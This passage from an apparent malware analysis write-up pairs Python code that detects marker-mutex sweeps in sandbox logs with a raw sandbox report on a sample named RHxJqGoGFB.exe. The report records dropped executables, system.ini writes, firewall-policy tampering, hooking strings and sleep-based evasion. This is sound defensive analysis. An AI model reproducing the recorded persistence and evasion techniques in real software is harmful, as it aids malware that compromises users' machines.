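Source: C:\\Users\\user\\Desktop\\RHxJqGoGFB.exe | Mutant created: \\Sessions\\1\\BaseNamedObjects\\registryM_92_
Source: C:\\Users\\user\\Desktop\\RHxJqGoGFB.exe | Mutant created: \\Sessions\\1\\BaseNamedObjects\\uxJLpe1m
Source: C:\\Users\\user\\Desktop\\RHxJqGoGFB.exe | Mutant created: \\Sessions\\1\\BaseNamedObjects\\rhxjqgogfb.exeM_7300_
Source: C:\\Windows\\System32\\conhost.exe | Mutant created: \\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7308:120:WilError_03
"""

EVENT_RE = re.compile(
    r"^Source:\s*(?P<source>.+?)\s*\|\s*Mutant created:\s*(?P<path>\S.*?)\s*$"
)
# Marker scheme seen in the report: "<lower-cased image name>M_<pid>_".
# The image name may lack ".exe" ("registry", "memory compression") and may
# contain spaces, so the name is matched greedily up to the final M_<digits>_.
MARKER_RE = re.compile(r"^(?P<proc>.+)M_(?P<pid>\d+)_$")


def parse_event(line):
    """Return (source_image, mutant_leaf_name) for a 'Mutant created' row, else None."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    # Keep only the leaf: the \Sessions\N\BaseNamedObjects\ (or Local\) prefix
    # says nothing about the marker scheme.
    leaf = m.group("path").rsplit("\\", 1)[-1]
    return m.group("source"), leaf


def parse_marker(name):
    """Split '<proc>M_<pid>_' into ('<proc>', pid); return None for any other name."""
    m = MARKER_RE.match(name)
    if not m:
        return None
    return m.group("proc"), int(m.group("pid"))


def summarize(log_text):
    """Group marker mutexes by the process that created them.

    Returns {source: {"pids": set, "procs": set, "other": set}} where "other"
    holds names that do not follow the marker scheme (e.g. uxJLpe1m).
    """
    out = defaultdict(lambda: {"pids": set(), "procs": set(), "other": set()})
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev is None:
            continue
        source, leaf = ev
        marker = parse_marker(leaf)
        if marker is None:
            out[source]["other"].add(leaf)
        else:
            proc, pid = marker
            out[source]["procs"].add(proc)
            out[source]["pids"].add(pid)
    return dict(out)


def flag_marker_sweeps(summary, min_pids=3):
    """Return sources that stamped a marker for at least min_pids distinct PIDs.

    A benign program has no reason to create a mutex named after every other
    process's image name and PID; one creator covering many PIDs is the
    fingerprint of the snapshot-and-mark loop in function 0_2_00902514.
    min_pids is an assumed tuning value.
    """
    return sorted(src for src, s in summary.items() if len(s["pids"]) >= min_pids)


if __name__ == "__main__":
    summary = summarize(SAMPLE_LOG)
    for src in flag_marker_sweeps(summary):
        s = summary[src]
        print(f"{src}: markers for {len(s['pids'])} PIDs, "
              f"images={sorted(s['procs'])}, other={sorted(s['other'])}")
```

Run against the constructed rows, the sweep check singles out RHxJqGoGFB.exe (six PIDs, including its own 7300) and leaves conhost.exe alone, whose only mutex is its WilError name. On a live host the same parse_marker() can be pointed at a mutex listing from a handle enumerator instead of at a sandbox log; the scheme is the same.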
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | File created: C:\Users\user\AppData\Local\Temp\odnhm.exe
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | File read: C:\Windows\system.ini
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: RHxJqGoGFB.exe | ReversingLabs: Detection: 94%
        Source: RHxJqGoGFB.exe | String found in binary or memory: F-STOPW.
        Source: unknown | Process created: C:\Users\user\Desktop\RHxJqGoGFB.exe "C:\Users\user\Desktop\RHxJqGoGFB.exe"
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Process created: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Process created: C:\Windows\System32\RuntimeBroker.exe C:\Windows\System32\RuntimeBroker.exe -Embedding
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Section loaded: apphelp.dll
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Section loaded: mpr.dll
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Section loaded: wininet.dll
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Section loaded: sspicli.dll
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Section loaded: sfc.dll
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Section loaded: sfc_os.dll
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Section loaded: mswsock.dll
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Section loaded: iertutil.dll
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Section loaded: profapi.dll
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Section loaded: winhttp.dll
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Section loaded: iphlpapi.dll
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Section loaded: winnsi.dll
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Section loaded: urlmon.dll
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Section loaded: srvcli.dll
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Section loaded: netutils.dll
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Section loaded: dnsapi.dll
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Section loaded: rasadhlp.dll
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Section loaded: drprov.dll
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Section loaded: winsta.dll
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Section loaded: ntlanman.dll
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Section loaded: davclnt.dll
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Section loaded: davhlpr.dll
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Section loaded: wkscli.dll
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Section loaded: cscapi.dll
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Section loaded: browcli.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: dxgi.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: wincorlib.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: windows.ui.xaml.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: coremessaging.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: bcp47langs.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: iertutil.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: dcomp.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: twinapi.appcore.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: wintypes.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: windows.staterepositorycore.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: windows.ui.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: windowmanagementapi.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: textinputframework.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: coreuicomponents.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: inputhost.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: propsys.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: ntmarta.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: urlmon.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: srvcli.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: netutils.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: resourcepolicyclient.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: d3d11.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: d3d10warp.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: quickactionsdatamodel.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: dxcore.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: d2d1.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: dwrite.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: windows.storage.applicationdata.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: mrmcorer.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: wldp.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: windows.staterepositoryclient.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: profapi.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: languageoverlayutil.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: bcp47mrm.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: windows.shell.servicehostbuilder.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: execmodelproxy.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: rmclient.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: uiamanager.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: textshaping.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: windows.ui.core.textinput.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: windows.ui.immersive.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: dataexchange.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: windows.globalization.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: windows.globalization.fontgroups.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: fontgroupsoverride.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | Section loaded: directmanipulation.dll
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: notificationcontrollerps.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.ui.xaml.controls.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.applicationmodel.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.graphics.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: audioses.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: mmdevapi.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: devobj.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: usermgrproxy.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: avrt.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windows.web.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: logoncli.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: windowscodecs.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: threadpoolwinrt.dllJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: rmclient.dllJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: structuredquery.dllJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: windows.storage.search.dllJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: windows.staterepositorycore.dllJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: dxcore.dll
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: msasn1.dll
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeFile written: C:\Windows\system.iniJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00987AC0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00987AC0
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00401360 push eax; ret 0_2_0040138D
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00407601 push 3CF3CF74h; iretd 0_2_004075C1
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00407601 push eax; iretd 0_2_00407660
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00404C0D push eax; ret 0_2_00404F3B
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_004075C2 push 3CF3CF74h; iretd 0_2_004075C1
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_004074D3 push 3CF3CF74h; iretd 0_2_004075C1
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00407580 push 3CF3CF74h; iretd 0_2_004075C1
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00404F86 push eax; ret 0_2_00404F3B
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00404B95 push eax; ret 0_2_00404BC2
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00404BAE push eax; ret 0_2_00404BC2
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_004072BE pushfd ; iretd 0_2_004072BF
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00908060 push eax; ret 0_2_0090808E
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_0097EFD0 push eax; ret 0_2_0097EF85
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_0097EBDF push eax; ret 0_2_0097EC0C
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_0097EBF8 push eax; ret 0_2_0097EC0C
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_0097EF58 push eax; ret 0_2_0097EF85
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 35_2_007F147F push eax; ret 35_2_007F14AC
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 35_2_007F17F8 push eax; ret 35_2_007F1825
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 35_2_007F1870 push eax; ret 35_2_007F1825
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 35_2_007F1498 push eax; ret 35_2_007F14AC
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 36_2_00C917F8 push eax; ret 36_2_00C91825
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 36_2_00C9147F push eax; ret 36_2_00C914AC
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 36_2_00C91870 push eax; ret 36_2_00C91825
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 36_2_00C91498 push eax; ret 36_2_00C914AC
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 37_2_01291498 push eax; ret 37_2_012914AC
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 37_2_012917F8 push eax; ret 37_2_01291825
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 37_2_0129147F push eax; ret 37_2_012914AC
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 37_2_01291870 push eax; ret 37_2_01291825
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 38_2_00F61870 push eax; ret 38_2_00F61825
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 38_2_00F6147F push eax; ret 38_2_00F614AC
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeCode function: 38_2_00F617F8 push eax; ret 38_2_00F61825
        Source: RHxJqGoGFB.exeStatic PE information: section name: .data entropy: 7.988084869146433
        Source: odnhm.exe.0.drStatic PE information: section name: .text entropy: 7.987906960065672
        Source: rkuso.exe.0.drStatic PE information: section name: .text entropy: 7.9869914828814625
        Source: clmaq.pif.0.drStatic PE information: section name: .text entropy: 7.9869914828814625

        Persistence and Installation Behavior

        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe File created: C:\clmaq.pif
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe File created: C:\Users\user\AppData\Local\Temp\rkuso.exe
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe File created: C:\Users\user\AppData\Local\Temp\odnhm.exe
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe File created: C:\clmaq.pif
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile

        Hooking and other Techniques for Hiding and Protection

        Source: RHxJqGoGFB.exe Binary or memory string: KeServiceDescriptorTable
        Source: RHxJqGoGFB.exe, 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: KeServiceDescriptorTable
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\RuntimeBroker.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\RuntimeBroker.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\RuntimeBroker.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\RuntimeBroker.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\RuntimeBroker.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Stalling execution: Execution stalls by calling Sleep
        Source: SearchApp.exe, 00000013.00000000.2135580093.0000024B5A743000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINDOWS KITS\10\DEBUGGERS\X64\WINDBG.EXE11179U
        Source: SearchApp.exe, 00000013.00000000.2135580093.0000024B5A743000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINDOWS KITS\10\DEBUGGERS\X64\WINDBG.EXE11179
